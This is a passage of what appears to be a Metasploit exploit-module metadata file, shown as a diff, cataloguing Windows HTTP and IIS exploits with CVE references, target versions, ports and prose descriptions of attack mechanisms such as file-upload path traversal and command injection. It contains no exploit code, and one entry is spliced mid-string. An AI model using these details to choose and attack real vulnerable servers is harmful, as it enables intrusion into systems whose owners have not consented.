"post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ultraminihttp_bof": { - "name": "Ultra Mini HTTPD Stack Buffer Overflow", - "fullname": "exploit/windows/http/ultraminihttp_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-07-10", - "type": "exploit", - "author": [ - "superkojiman", - "PsychoSpy ", - "OJ Reeves " - ], - "description": "This module exploits a stack based buffer overflow in Ultra Mini HTTPD 1.21,\n allowing remote attackers to execute arbitrary code via a long resource name in an HTTP\n request. This exploit has to deal with the fact that the application's request handler\n thread is terminated after 60 seconds by a \"monitor\" thread. To do this, it allocates\n some RWX memory, copies the payload to it and creates another thread. When done, it\n terminates the current thread so that it doesn't crash and hence doesn't bring down\n the process with it.", - "references": [ - "OSVDB-95164", - "EDB-26739", - "CVE-2013-5019", - "BID-61130" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "v1.21 - Windows Server 2000", - "v1.21 - Windows XP SP0", - "v1.21 - Windows XP SP2/SP3", - "v1.21 - Windows Server 2003 (Enterprise)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/ultraminihttp_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/ultraminihttp_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/umbraco_upload_aspx": { - "name": "Umbraco CMS Remote Command Execution", - "fullname": "exploit/windows/http/umbraco_upload_aspx", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-06-28", - "type": "exploit", - "author": [ - "Toby Clarke", - "juan vazquez " - ], - "description": "This module can be used to execute a payload on Umbraco CMS 4.7.0.378.\n The payload is uploaded as an ASPX script by sending a specially crafted\n SOAP request to codeEditorSave.asmx, which permits unauthorized file upload\n via the SaveDLRScript operation. SaveDLRScript is also subject to a path\n traversal vulnerability, allowing code to be placed into the web-accessible\n /umbraco/ directory.\n\n The module writes, executes and then overwrites an ASPX script; note that\n though the script content is removed, the file remains on the target. Automatic\n cleanup of the file is intended if a meterpreter payload is used.\n\n This module has been tested successfully on Umbraco CMS 4.7.0.378 on a Windows\n 7 32-bit SP1. In this scenario, the \"IIS APPPOOL\\ASP.NET v4.0\" user must have\n write permissions on the Windows Temp folder.", - "references": [ - "OSVDB-83765", - "EDB-19671", - "URL-http://blog.gdssecurity.com/labs/2012/7/3/find-bugs-faster-with-a-webmatrix-local-reference-instance.html", - "URL-http://umbraco.codeplex.com/workitem/18192" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Umbraco CMS 4.7.0.378 / Microsoft Windows 7 Professional 32-bit SP1" - ], - "mod_time": "2019-08-02 09:48:53 +0000", - "path": "/modules/exploits/windows/http/umbraco_upload_aspx.rb", - "is_install_path": true, - "ref_name": "windows/http/umbraco_upload_aspx", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/vmware_vcenter_chargeback_upload": { - "name": "VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload", - "fullname": "exploit/windows/http/vmware_vcenter_chargeback_upload", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-05-15", - "type": "exploit", - "author": [ - "Andrea Micalizzi", - "juan vazquez " - ], - "description": "This module exploits a code execution flaw in VMware vCenter Chargeback Manager,\n where the ImageUploadServlet servlet allows unauthenticated file upload. The files\n are uploaded to the /cbmui/images/ web path, where JSP code execution is allowed.\n The module has been tested successfully on VMware vCenter Chargeback Manager 2.0.1\n on Windows 2003 SP2.", - "references": [ - "CVE-2013-3520", - "OSVDB-94188", - "BID-60484", - "ZDI-13-147" - ], - "platform": "Windows", - "arch": "x86", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "VMware vCenter Chargeback Manager 2.0.1 / Windows 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb", - "is_install_path": true, - "ref_name": "windows/http/vmware_vcenter_chargeback_upload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/vxsrchs_bof": { - "name": "VX Search Enterprise GET Buffer Overflow", - "fullname": "exploit/windows/http/vxsrchs_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2017-03-15", - "type": "exploit", - "author": [ - "Daniel Teixeira" - ], - "description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of VX Search Enterprise v9.5.12, caused by\n improper bounds checking of the request path in HTTP GET requests\n sent to the built-in web server. This module has been tested\n successfully on Windows 7 SP1 x86.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "VX Search Enterprise v9.5.12" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/vxsrchs_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/vxsrchs_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/webster_http": { - "name": "Webster HTTP Server GET Buffer Overflow", - "fullname": "exploit/windows/http/webster_http", - "aliases": [], - "rank": 200, - "disclosure_date": "2002-12-02", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This exploits a stack buffer overflow in the Webster HTTP server.\n The server and source code was released within an article from\n the Microsoft Systems Journal in February 1996 titled \"Write a\n Simple HTTP-based Server Using MFC and Windows Sockets\".", - "references": [ - "CVE-2002-2268", - "OSVDB-44106", - "BID-6289", - "URL-http://www.microsoft.com/msj/archive/s25f.aspx", - "URL-http://www.netdave.com/webster/webster.htm" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows XP SP0", - "Debug" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/webster_http.rb", - "is_install_path": true, - "ref_name": "windows/http/webster_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ws_ftp_rce_cve_2023_40044": { - "name": "Progress Software WS_FTP Unauthenticated Remote Code Execution", - "fullname": "exploit/windows/http/ws_ftp_rce_cve_2023_40044", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-09-27", - "type": "exploit", - "author": [ - "sfewer-r7" - ], - "description": "This module exploits an unsafe .NET deserialization vulnerability to achieve unauthenticated remote code\n execution against a vulnerable WS_FTP server running the Ad Hoc Transfer module. All versions of WS_FTP Server\n prior to 2020.0.4 (version 8.7.4) and 2022.0.2 (version 8.8.2) are vulnerable to this issue. The vulnerability\n was originally discovered by AssetNote.", - "references": [ - "CVE-2023-40044", - "URL-https://attackerkb.com/topics/bn32f9sNax/cve-2023-40044/rapid7-analysis", - "URL-https://community.progress.com/s/article/WS-FTP-Server-Critical-Vulnerability-September-2023", - "URL-https://www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows" - ], - "mod_time": "2023-10-04 09:39:25 +0000", - "path": "/modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb", - "is_install_path": true, - "ref_name": "windows/http/ws_ftp_rce_cve_2023_40044", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/xampp_webdav_upload_php": { - "name": "XAMPP WebDAV PHP Upload", - "fullname": "exploit/windows/http/xampp_webdav_upload_php", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-01-14", - "type": "exploit", - "author": [ - "theLightCosine " - ], - "description": "This module exploits weak WebDAV passwords on XAMPP servers.\n It uses supplied credentials to upload a PHP payload and\n execute it.", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2018-08-20 18:08:19 +0000", - "path": "/modules/exploits/windows/http/xampp_webdav_upload_php.rb", - "is_install_path": true, - "ref_name": "windows/http/xampp_webdav_upload_php", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/xitami_if_mod_since": { - "name": "Xitami 2.5c2 Web Server If-Modified-Since Overflow", - "fullname": "exploit/windows/http/xitami_if_mod_since", - "aliases": [], - "rank": 200, - "disclosure_date": "2007-09-24", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a stack buffer overflow in the iMatix Corporation\n Xitami Web Server. If a malicious user sends an\tIf-Modified-Since\n header containing an overly long string, it may be possible to\n execute a payload remotely. Due to size constraints, this module uses\n the Egghunter technique.", - "references": [ - "CVE-2007-5067", - "OSVDB-40594", - "OSVDB-40595", - "BID-25772", - "EDB-4450" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "xigui32.exe Universal", - "xitami.exe Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/xitami_if_mod_since.rb", - "is_install_path": true, - "ref_name": "windows/http/xitami_if_mod_since", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/zentao_pro_rce": { - "name": "ZenTao Pro 8.8.2 Remote Code Execution", - "fullname": "exploit/windows/http/zentao_pro_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-06-20", - "type": "exploit", - "author": [ - "Daniel Monzón", - "Melvin Boers", - "Erik Wynter" - ], - "description": "This module exploits a command injection vulnerability in ZenTao Pro\n 8.8.2 and earlier versions in order to execute arbitrary commands with\n SYSTEM privileges.\n\n The module first attempts to authenticate to the ZenTao dashboard. It\n then tries to execute the payload by submitting fake repositories via\n the 'Repo Create' function that is accessible from the dashboard via\n CI>Repo. More precisely, the module sends HTTP POST requests to\n '/pro/repo-create.html' that inject commands in the vulnerable 'path'\n parameter which corresponds to the 'Client Path' input field.\n\n Valid credentials for a ZenTao admin account are required. This module\n has been successfully tested against ZenTao 8.8.1 and 8.8.2 running on\n Windows 10 (XAMPP server).", - "references": [ - "EDB-48633", - "CVE-2020-7361" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows (x86)", - "Windows (x64)" - ], - "mod_time": "2023-02-10 18:04:31 +0000", - "path": "/modules/exploits/windows/http/zentao_pro_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/zentao_pro_rce", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/zenworks_assetmgmt_uploadservlet": { - "name": "Novell ZENworks Asset Management Remote Execution", - "fullname": "exploit/windows/http/zenworks_assetmgmt_uploadservlet", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-11-02", - "type": "exploit", - "author": [ - "Unknown", - "juan vazquez " - ], - "description": "This module exploits a path traversal flaw in Novell ZENworks Asset Management\n 7.5. By exploiting the CatchFileServlet, an attacker can upload a malicious file\n outside of the MalibuUploadDirectory and then make a secondary request that allows\n for arbitrary code execution.", - "references": [ - "CVE-2011-2653", - "OSVDB-77583", - "BID-50966", - "ZDI-11-342", - "URL-http://download.novell.com/Download?buildid=hPvHtXeNmCU~" - ], - "platform": "Java", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Java Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb", - "is_install_path": true, - "ref_name": "windows/http/zenworks_assetmgmt_uploadservlet", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/zenworks_uploadservlet": { - "name": "Novell ZENworks Configuration Management Remote Execution", - "fullname": "exploit/windows/http/zenworks_uploadservlet", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-03-30", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a code execution flaw in Novell ZENworks Configuration Management 10.2.0.\n By exploiting the UploadServlet, an attacker can upload a malicious file outside of the TEMP directory\n and then make a secondary request that allows for arbitrary code execution.", - "references": [ - "CVE-2010-5324", - "OSVDB-63412", - "BID-39114", - "ZDI-10-078", - "URL-http://tucanalamigo.blogspot.com/2010/04/pdc-de-zdi-10-078.html", - "URL-http://www.novell.com/support/kb/doc.php?id=7005573" - ], - "platform": "Java,Linux,Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Java Universal", - "Windows x86", - "Linux x86" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/zenworks_uploadservlet.rb", - "is_install_path": true, - "ref_name": "windows/http/zenworks_uploadservlet", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/zoho_password_manager_pro_xml_rpc_rce": { - "name": "Zoho Password Manager Pro XML-RPC Java Deserialization", - "fullname": "exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2022-06-24", - "type": "exploit", - "author": [ - "Vinicius", - "Y4er", - "Grant Willcox" - ], - "description": "This module exploits a Java deserialization vulnerability in Zoho ManageEngine Pro\n before 12101 and PAM360 before 5510. Unauthenticated attackers can send a\n crafted XML-RPC request containing malicious serialized data to /xmlrpc to\n gain RCE as the SYSTEM user.", - "references": [ - "CVE-2022-35405", - "URL-https://xz.aliyun.com/t/11578", - "URL-https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html", - "URL-https://archives2.manageengine.com/passwordmanagerpro/12101/ManageEngine_PasswordManager_Pro_12100_to_12101.ppm" - ], - "platform": "Windows", - "arch": "cmd, x64", - "rport": 7272, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows EXE Dropper", - "Windows Command", - "Windows Powershell" - ], - "mod_time": "2022-08-02 14:27:27 +0000", - "path": "/modules/exploits/windows/http/zoho_password_manager_pro_xml_rpc_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/zoho_password_manager_pro_xml_rpc_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ibm/ibm_was_dmgr_java_deserialization_rce": { - "name": "IBM Websphere Application Server Network Deployment Untrusted Data Deserialization Remote Code Execution", - "fullname": "exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-05-15", - "type": "exploit", - "author": [ - "b0yd" - ], - "description": "This module exploits untrusted serialized data processed by the WAS DMGR Server and Cells.\n NOTE: There is a required 2 minute timeout between attempts as the neighbor being added must be reset.", - "references": [ - "CVE-2019-4279", - "URL-https://www-01.ibm.com/support/docview.wss?uid=ibm10883628" - ], - "platform": "Windows", - "arch": "", - "rport": 11006, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Binary", - "CMD" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ibm/ibm_was_dmgr_java_deserialization_rce.rb", - "is_install_path": true, - "ref_name": "windows/ibm/ibm_was_dmgr_java_deserialization_rce", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/iis/iis_webdav_scstoragepathfromurl": { - "name": "Microsoft IIS WebDav ScStoragePathFromUrl Overflow", - "fullname": "exploit/windows/iis/iis_webdav_scstoragepathfromurl", - "aliases": [], - "rank": 0, - "disclosure_date": "2017-03-26", - "type": "exploit", - "author": [ - "Zhiniang Peng", - "Chen Wu", - "Dominic Chell ", - "firefart", - "zcgonvh ", - "Rich Whitcroft", - "Lincoln" - ], - "description": "Buffer overflow in the ScStoragePathFromUrl function\n in the WebDAV service in Internet Information Services (IIS) 6.0\n in Microsoft Windows Server 2003 R2 allows remote attackers to\n execute arbitrary code via a long header beginning with\n \"If: " - ], - "description": "This module can be used to execute a payload on IIS servers that\n have world-writeable directories. The payload is uploaded as an ASP\n script via a WebDAV PUT request.\n\n The target IIS machine must meet these conditions to be considered\n as exploitable: It allows 'Script resource access', Read and Write\n permission, and supports ASP.", - "references": [ - "OSVDB-397", - "BID-12141" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2019-05-22 09:05:56 +0000", - "path": "/modules/exploits/windows/iis/iis_webdav_upload_asp.rb", - "is_install_path": true, - "ref_name": "windows/iis/iis_webdav_upload_asp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/iis/ms01_023_printer": { - "name": "MS01-023 Microsoft IIS 5.0 Printer Host Header Overflow", - "fullname": "exploit/windows/iis/ms01_023_printer", - "aliases": [], - "rank": 400, - "disclosure_date": "2001-05-01", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This exploits a buffer overflow in the request processor of the\n Internet Printing Protocol ISAPI module in IIS. This module\n works against Windows 2000 Server and Professional SP0-SP1.\n\n If the service stops responding after a successful compromise,\n run the exploit a couple more times to completely kill the\n hung process.", - "references": [ - "CVE-2001-0241", - "OSVDB-3323", - "BID-2674", - "MSB-MS01-023", - "URL-https://seclists.org/lists/bugtraq/2001/May/0005.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2000 SP0-SP1 (Arabic)", - "Windows 2000 SP0-SP1 (Czech)", - "Windows 2000 SP0-SP1 (Chinese)", - "Windows 2000 SP0-SP1 (Dutch)", - "Windows 2000 SP0-SP1 (English)", - "Windows 2000 SP0-SP1 (French)", - "Windows 2000 SP0-SP1 (Finnish)", - "Windows 2000 SP0-SP1 (German)", - "Windows 2000 SP0-SP1 (Korean)", - "Windows 2000 SP0-SP1 (Hungarian)", - "Windows 2000 SP0-SP1 (Italian)", - "Windows 2000 SP0-SP1 (Portuguese)", - "Windows 2000 SP0-SP1 (Spanish)", - "Windows 2000 SP0-SP1 (Swedish)", - "Windows 2000 SP0-SP1 (Turkish)", - "Windows 2000 Pro SP0 (Greek)", - "Windows 2000 Pro SP1 (Greek)" - ], - "mod_time": "2022-07-09 01:36:10 +0000", - "path": "/modules/exploits/windows/iis/ms01_023_printer.rb", - "is_install_path": true, - "ref_name": "windows/iis/ms01_023_printer", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/iis/ms01_026_dbldecode": { - "name": "MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution", - "fullname": "exploit/windows/iis/ms01_026_dbldecode", - "aliases": [], - "rank": 600, - "disclosure_date": "2001-05-15", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module will execute an arbitrary payload on a Microsoft IIS installation\n that is vulnerable to the CGI double-decode vulnerability of 2001.\n\n This module has been tested successfully on:\n\n Windows 2000 Professional (SP0) (EN);\n Windows 2000 Professional (SP1) (AR);\n Windows 2000 Professional (SP1) (CZ);\n Windows 2000 Server (SP0) (FR);\n Windows 2000 Server (SP1) (EN); and\n Windows 2000 Server (SP1) (SE).\n\n Note: This module will leave a Metasploit payload exe in the IIS scripts directory.", - "references": [ - "CVE-2001-0333", - "OSVDB-556", - "BID-2708", - "MSB-MS01-026", - "URL-http://marc.info/?l=bugtraq&m=98992056521300&w=2" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows (Dropper)", - "Windows (Command)" - ], - "mod_time": "2022-07-03 18:22:55 +0000", - "path": "/modules/exploits/windows/iis/ms01_026_dbldecode.rb", - "is_install_path": true, - "ref_name": "windows/iis/ms01_026_dbldecode", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/iis/ms01_033_idq": { - "name": "MS01-033 Microsoft IIS 5.0 IDQ Path Overflow", - "fullname": "exploit/windows/iis/ms01_033_idq", - "aliases": [], - "rank": 400, - "disclosure_date": "2001-06-18", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the IDQ ISAPI handler for\n Microsoft Index Server.", - "references": [ - "CVE-2001-0500", - "OSVDB-568", - "MSB-MS01-033", - "BID-2880" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro English SP0", - "Windows 2000 Pro English SP1-SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/iis/ms01_033_idq.rb", - "is_install_path": true, - "ref_name": "windows/iis/ms01_033_idq", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/iis/ms02_018_htr": { - "name": "MS02-018 Microsoft IIS 4.0 .HTR Path Overflow", - "fullname": "exploit/windows/iis/ms02_018_htr", - "aliases": [], - "rank": 400, - "disclosure_date": "2002-04-10", - "type": "exploit", - "author": [ - "stinko " - ], - "description": "This exploits a buffer overflow in the ISAPI ISM.DLL used to\n process HTR scripting in IIS 4.0. This module works against\n Windows NT 4 Service Packs 3, 4, and 5. The server will\n continue to process requests until the payload being\n executed has exited. If you've set EXITFUNC to 'seh', the\n server will continue processing requests, but you will have\n trouble terminating a bind shell. If you set EXITFUNC to\n thread, the server will crash upon exit of the bind shell.\n The payload is alpha-numerically encoded without a NOP sled\n because otherwise the data gets mangled by the filters.", - "references": [ - "CVE-1999-0874", - "OSVDB-3325", - "BID-307", - "URL-http://www.eeye.com/html/research/advisories/AD19990608.html", - "MSB-MS02-018" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows NT 4.0 SP3", - "Windows NT 4.0 SP4", - "Windows NT 4.0 SP5" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/iis/ms02_018_htr.rb", - "is_install_path": true, - "ref_name": "windows/iis/ms02_018_htr", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/iis/ms02_065_msadc": { - "name": "MS02-065 Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow", - "fullname": "exploit/windows/iis/ms02_065_msadc", - "aliases": [], - "rank": 300, - "disclosure_date": "2002-11-02", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module can be used to execute arbitrary code on IIS servers\n that expose the /msadc/msadcs.dll Microsoft Data Access Components\n (MDAC) Remote Data Service (RDS) DataFactory service. The service is\n exploitable even when RDS is configured to deny remote connections\n (handsafe.reg). The service is vulnerable to a heap overflow where\n the RDS DataStub 'Content-Type' string is overly long. Microsoft Data\n Access Components (MDAC) 2.1 through 2.6 are known to be vulnerable.", - "references": [ - "OSVDB-14502", - "BID-6214", - "CVE-2002-1142", - "MSB-MS02-065", - "URL-http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0082.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2000 Pro SP0-SP3 (English)", - "Windows 2000 Pro SP0 (Korean)", - "Windows 2000 Pro SP0 (Dutch)", - "Windows 2000 Pro SP0 (Finnish)", - "Windows 2000 Pro SP0 (Turkish)", - "Windows 2000 Pro SP0-SP1 (Greek)", - "Windows 2000 Pro SP1 (Arabic)", - "Windows 2000 Pro SP1 (Czech)", - "Windows 2000 Pro SP2 (French)", - "Windows 2000 Pro SP2 (Portuguese)" - ], - "mod_time": "2022-07-15 00:15:56 +0000", - "path": "/modules/exploits/windows/iis/ms02_065_msadc.rb", - "is_install_path": true, - "ref_name": "windows/iis/ms02_065_msadc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/iis/ms03_007_ntdll_webdav": { - "name": "MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow", - "fullname": "exploit/windows/iis/ms03_007_ntdll_webdav", - "aliases": [], - "rank": 500, - "disclosure_date": "2003-05-30", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This exploits a buffer overflow in NTDLL.dll on Windows 2000\n through the SEARCH WebDAV method in IIS. This particular\n module only works against Windows 2000. It should have a\n reasonable chance of success against SP0 to SP3.", - "references": [ - "CVE-2003-0109", - "OSVDB-4467", - "BID-7116", - "PACKETSTORM-30939", - "MSB-MS03-007" - ], - "platform": "Windows", - "arch": "x86", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Brute Force" - ], - "mod_time": "2022-07-07 20:31:57 +0000", - "path": "/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb", - "is_install_path": true, - "ref_name": "windows/iis/ms03_007_ntdll_webdav", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/iis/msadc": { - "name": "MS99-025 Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution", - "fullname": "exploit/windows/iis/msadc", - "aliases": [], - "rank": 600, - "disclosure_date": "1998-07-17", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module can be used to execute arbitrary commands on IIS servers\n that expose the /msadc/msadcs.dll Microsoft Data Access Components\n (MDAC) Remote Data Service (RDS) DataFactory service using VbBusObj\n or AdvancedDataFactory to inject shell commands into Microsoft Access\n databases (MDBs), MSSQL databases and ODBC/JET Data Source Name (DSN).\n Based on the msadcs.pl v2 exploit by Rain.Forest.Puppy, which was actively\n used in the wild in the late Ninties. MDAC versions affected include MDAC\n 1.5, 2.0, 2.0 SDK, 2.1 and systems with the MDAC Sample Pages for RDS\n installed, and NT4 Servers with the NT Option Pack installed or upgraded\n 2000 systems often running IIS3/4/5 however some vulnerable installations\n can still be found on newer Windows operating systems. Note that newer\n releases of msadcs.dll can still be abused however by default remote\n connections to the RDS is denied. Consider using VERBOSE if you're unable\n to successfully execute a command, as the error messages are detailed\n and useful for debugging. Also set NAME to obtain the remote hostname,\n and METHOD to use the alternative VbBusObj technique.", - "references": [ - "OSVDB-272", - "BID-529", - "CVE-1999-1011", - "MSB-MS98-004", - "MSB-MS99-025" - ], - "platform": "Windows", - "arch": "", - "rport": 